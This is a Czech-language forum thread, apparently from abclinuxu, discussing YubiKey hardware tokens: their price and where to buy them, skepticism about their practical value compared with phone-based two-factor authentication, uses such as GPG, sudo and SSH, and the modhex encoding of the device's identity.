To nejsou hračky navozující pocit bezpečnosti, ale kryptografické tokeny. Umožňují mimojiné zcela oddělit uložení klíčů od počítače, což se může hodit. Navíc to nejsou žádné drahé hračky, aspoň pokud nejde o individuální objednávku jednoho kusu. Za holkama je lepší chodit bez peněz, člověk aspoň o tolik nepřijde. Na pivo stačí pár drobných.

Já už tu vlastně ani nejsem. Abclinuxu umřelo.

7.5.2016 09:10 Michal Kubeček | skóre: 71 | Luštěnice
Rozbalit Rozbalit vše Re: Yubikey. Co to je a co to umí (1)

Ani při individuální objednávce jednoho kusu to není až tak drahé. Yubikey 4 se dá v ČR pořídit za 1162 Kč včetně DPH, to už jsem utratil víc za větší blbosti.

7.5.2016 23:37 petrfm | skóre: 23
Rozbalit Rozbalit vše Re: Yubikey. Co to je a co to umí (1)

Umožňují mimojiné zcela oddělit uložení klíčů od počítače, což se může hodit.

Co to je jsem si přečetl. Ale k čemu to je? Kromě toho, že by se to někdy mohlo hodit? Prakticky...? Já v tom prakticky vidím jenom opruz, že abych se dostal do systému, budu muset po baráku hledat nějakou 3.14čovinu právě ve chvíli, kdy se mi nechce ani pohnout. Připadá mi to jako nahrazovat kódový zámek do prosklených dveří obrovskou kladkou na dvoukilový litionvý klíč, abych ve finále zůstal stát jak opařený před šutrem rozbitými skleněnými dveřmi se slovy : WTF? S kamenem jsem ve svém paranoidním scénáři nepočítal, to bylo moc jednoduché :-D

Můj názor je, že každé takové řešení zatěžuje jenom jeho majitele :-)

Chápal bych to u systému, který běží offline a jediným rozhraním je klávesnice a USBčko. Čili mi to aspoň urychlí login. Prostě zmáčknu tlačítko a je to.

Přesto nechápu, proč kupovat nějakou předraženou kravinu, když se to beztak dá spíchnout na nějakém arduinu za 2USD.

fuck the cola, fuck the pizza, all you need is slivovitza

8.5.2016 00:19 Bystroushaak | skóre: 36 | blog: Bystroushaakův blog | Praha
Rozbalit Rozbalit vše Re: Yubikey. Co to je a co to umí (1)

Když tě tak čtu, tak mi dochází, že jsem těmi články odvedl špatnou práci, protože jsi to vůbec nepochopil. Marně přemýšlím, jestli jsem selhal u popisu yubikeye, nebo obecně tokenů. Možná jsem měl přidat nějaké obrázky s UML sequence diagramama. Nejspíš jsem to měl přečíst někoho totálně BFU, abych věděl, jak moc věcí jsem předpokládal jako implicitní znalost a případně je vysvětlit.

blog.rfox.eu | Lessons learned from games

8.5.2016 01:25 petrfm | skóre: 23
Rozbalit Rozbalit vše Re: Yubikey. Co to je a co to umí (1)

Napsal jsi to moc hezky, ale popsal jsi věc, kterou dávno mám a nosím sebou - mobil. Ta zvládne to samé. Že se dá napadnout? Ano, to dá. Token se dá ukrást. Jaká je pravděpodobnost? Přibližně stejná. Takže? To nepřináší nic navíc, jenom další krám a výdaje.

Prakticky - kolikrát se ti někdo dostal do systému a napadl další stroje? A z druhé strany - kolikrát se ti někdo dostal do systému, protože v komponentě byla nezalátaná díra, kterou útočník zneužil?

IB ? mám sms autorizaci - čili OK Webmail ? Zapomenu 3.14čovinu doma na stole a nepříhlásím se do mailu? Hmm, výborná fičura. Takže si nastavím ještě jednorázové heslo? Kdo to podporuje? Normální heslo? Jsem kde jsem byl.

Nějaký další argument, proč by si to kdokoliv jiný, než paranoik, nebo sběratel HW měl koupit? Jako je to hezké, ale to třeba parní stroj taky. Mám rád technické věci, ale tohle mi moc připomíná USB flash disk na to, abych to musel mít ve vitrýnce :-)

fuck the cola, fuck the pizza, all you need is slivovitza

8.5.2016 01:34 Bystroushaak | skóre: 36 | blog: Bystroushaakův blog | Praha
Rozbalit Rozbalit vše Re: Yubikey. Co to je a co to umí (1)

A z druhé strany - kolikrát se ti někdo dostal do systému, protože v komponentě byla nezalátaná díra, kterou útočník zneužil?

Nice try, FBI.

blog.rfox.eu | Lessons learned from games

9.5.2016 02:22 petrfm | skóre: 23
Rozbalit Rozbalit vše Re: Yubikey. Co to je a co to umí (1)

Nerozumím řeči tvého kmene.

fuck the cola, fuck the pizza, all you need is slivovitza

12.5.2016 16:44 Jakub ZEMAN
Rozbalit Rozbalit vše Re: Yubikey. Co to je a co to umí (1)

Odpovědět | Sbalit | Link | Blokovat | Admin

Koupil jsem prvních pár kousků z yubikeys.cz , celkem se nám to líbí uvažujeme o masivním nasazení v rámci firmy jako policy. Máte s tím někdo nějakou zkušenost? Přeci jen nejsme google.

14.5.2016 01:36 limit_false | skóre: 23 | blog: limit_false
Rozbalit Rozbalit vše Re: Yubikey. Co to je a co to umí (1)

Největší otázka je: co si představuješ, že to bude umět? Nebo jaký problém to má řešit?

Protože Yubikey toho umí fakt hodně - od dvoufaktorové autentizace přes OTP a U2F, přes GPG použitelné i s SSH, nebo PIV applet s SSH?

Já osobně Yubikey převážne používám na 3 věci: především GPG klíč, su/sudo na některých serverech a SSH PIV applet.

When people want prime order group, give them prime order group.

24.5.2016 20:41 Pavel Krátký
Rozbalit Rozbalit vše Re: Yubikey. Co to je a co to umí (1)

Odpovědět | Sbalit | Link | Blokovat | Admin

K dostání je už i v ČR na www.yubikeys.cz .

26.10.2016 15:24 mykhal | skóre: 6
Rozbalit Rozbalit vše Re: Yubikey. Co to je a co to umí (1)

Odpovědět | Sbalit | Link | Blokovat | Admin

.. pro zajímavost, ve "výchozí poloze" je sériové číslo 4131447 (0x3f0a77) současně tou identitou ccccccevclii (0x0000003f0a77) - jde o yubičí kódování "hexmod" (s/0123456789abcdef/cbdefghijklnrtuv/g)

26.10.2016 15:29 mykhal | skóre: 6
Rozbalit Rozbalit vše Re: Yubikey. Co to je a co to umí (1)

ERRATA: "s/" => "y/", "/g" => "/"

26.10.2016 17:56 mykhal | skóre: 6
Rozbalit Rozbalit vše Re: Yubikey. Co to je a co to umí (1)

, "hexmod" => "modhex" # (:

Založit nové vlákno • Nahoru

Tiskni Sdílej: